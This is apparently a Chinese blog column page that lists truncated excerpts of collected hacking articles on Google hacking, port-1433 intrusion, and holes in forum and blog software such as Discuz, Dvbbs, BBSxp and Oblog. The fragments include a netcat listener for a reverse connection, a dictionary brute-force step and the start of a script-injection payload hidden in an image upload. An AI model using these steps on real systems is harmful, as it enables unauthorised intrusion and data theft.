得峰的专栏 [网络收藏]

/**作者：慈勤强 Http://blog.youkuaiyun.com/cqq

google黑客关键词： google黑客 google hacking其实并算不上什么新东西，当时并没有重视这种技术，认为webshell什么的，并无太大实际用途。google hacking其实并非如此简单... 　　google hacking的简单实现使用google中的一些语法可以提供给我们更多的信息(当然也提供给那些习惯攻击的人更多他们所想要的)，下面就来介绍一些常用的语法。 　　in

各种端口的入侵方法1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPas*.**e 进行字典暴破（字典是关键） 最后 SQLTool*.**e入侵 对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 （以上反向的，测试成功） sqlhel

入侵网站的各种漏洞的利用　 ? 文章来源:www.hackbase.com

入侵方法如下：目标bbsxp sql版或者 BBSxp 5.00 beta 2 SQL 的http://xxx.com/bbs注册一个用户：xxx 密码123456 可以xxx 这里123456的md5算法是：E10ADC3949BA59ABBE56E057F20F883E 呵呵 方便第一步：在xxx.co

Discuz 2.2F注册程序过滤不严漏洞创建时间：2004-11-12文章属性：整理文章提交：ZhaoHuan (zhaohuan_at_phack.org)整理: 召唤     ZhaoHuan@phack.org本来网站被黑是黑丢人的事,但既然在网站都公布出来了,只好厚脸皮发了这个漏洞是Discuz!免费版2.2F的注册程序存在过滤不严的问题，可以通过构造表单实现特殊的数据库查询，进而危

                              一、方法                               1、先进后台。利用CheckUserLogined漏洞直接加个后台管理员。关于这个CheckUserLogined漏洞我在《Blog的噩梦》（http://www.eviloctal.com/forum/htm_data/10/0508/13721.html）中有详

  厂商名字：动网先锋论谈厂商地址：http://www.dvbbs.net/漏洞程序：Dvbbs 7.1.0漏洞描述:Dvbbs 7.1.0 的Cookie存在泄露站点的绝对路径的漏洞，攻击者可以配合其它技术，实现SQL跨库查询等。漏洞利用例子:一、泄露绝对漏洞测试:对官方的测试站点:bbs.dvbbs.net上传一张图，代码如下:GIF89a<script>alert(docume

转述如下：boke/Cls_Main.asp 未过滤“”，可以产生以下问题：Sql = "Select UserID,UserName,NickName,BokeName,PassWord,BokeTitle,BokeChildTitle,BokeNote,JoinBokeTime,PageView,TopicNum,FavNum,PhotoNum,PostNum,TodayNum,Trackb

关于Oblog 2.52 help.asp漏洞的修补问题 这是一件很有意思的事情。 OBlog是一套基于asp的Blog系统，目前的版本是2.52吧。 前些日子，出现了个help.asp文件漏洞， 可以查看任意文件的

  专题文章 漏洞分析 安全配置 黑客教学 编程技术 工具介绍 火墙技术 入侵检测 破解专题 焦点公告 焦点峰会